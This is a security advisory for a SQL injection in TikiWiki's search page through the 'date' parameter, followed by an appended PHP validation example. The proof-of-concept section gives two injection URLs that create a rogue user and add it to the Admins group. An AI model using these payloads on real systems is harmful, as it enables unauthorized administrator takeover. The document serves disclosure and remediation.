Product: TikiWiki CMS/Groupware
Versions: 4.1, 3.4 LTS (Other versions may also be affected)
Vendor: http://info.tikiwiki.org/
Impact: SQL injection
Vulnerability Severity: HIGH
Authors: Mateusz Drygas
http://security.psnc.pl/
Advisory: http://security.psnc.pl/advisories/tikiwiki-4.1.txt

[ISSUE]
The search module in the TikiWiki portal is prone to an SQL injection vulnerability, which can be exploited by malicious people to conduct SQL injection attacks.

[DETAILS]
It was found that TikiWiki CMS/Groupware does not properly validate the "date" parameter value.

http://[HOST]/?tiki-searchresults.php?highlight=misja&date=1 month));[SQLi]

[POC]
http://[HOST]/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_users(email,login,password,hash) VALUES ('','bad_guy','lsjfsofasgfs',md5('lsjfsofasgfslsjfsofasgfs'));;--&search=>>

http://[HOST]/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_usergroups (`userId`, `groupName`) VALUES([user_id],'Admins');;--&search=>>

[SOLUTION]
Edit the source code to ensure that input is properly sanitized.
Update to Version 4.2 or 3.5 LTS or later.

[SUMMARY]
The vendor has been informed about these bugs.

Have a nice day.

Copyright 2010, Mateusz Drygas, PSNC Security Team. All rights reserved.
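
Added example, not TikiWiki's code or the vendor's fix: one way to apply the [SOLUTION] advice to the "date" parameter, assuming it is meant to carry a relative range such as "1 month", as the value in [DETAILS] suggests. The function names, the unit list and the three-digit limit are hypothetical.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical validator for the search "date" parameter (not TikiWiki code).
 * Assumption: the parameter carries "<count> <unit>", for example "1 month".
 * Returns [count, unit] taken from an allow-list, or null when rejected.
 */
function parse_search_date(string $raw): ?array
{
    // Whole-string match: 1-3 digits, one space, an allow-listed unit with an
    // optional plural "s". \A and \z (not ^ and $) so that nothing, not even
    // a trailing newline, can follow the unit.
    if (!preg_match('/\A(\d{1,3}) (day|week|month|year)s?\z/i', $raw, $m)) {
        return null;
    }
    $count = (int) $m[1];
    if ($count < 1) {
        return null;
    }
    return [$count, strtolower($m[2])];
}

/**
 * Turns a validated range into a Unix-timestamp cutoff. The integer result is
 * what gets bound as a query parameter; the request string never reaches SQL.
 */
function search_cutoff(string $raw, int $now): ?int
{
    $parsed = parse_search_date($raw);
    if ($parsed === null) {
        return null;
    }
    [$count, $unit] = $parsed;
    $start = new DateTimeImmutable('@' . $now);
    return $start->modify("-{$count} {$unit}")->getTimestamp();
}

// Constructed inputs; the second has the shape shown under [DETAILS].
$now = 1262304000; // fixed reference time so the run is repeatable
foreach (['1 month', '1 month));[SQLi]', "2 weeks\n", '0 day'] as $raw) {
    $cutoff = search_cutoff($raw, $now);
    echo json_encode($raw), ' => ', $cutoff ?? 'rejected', "\n";
}
```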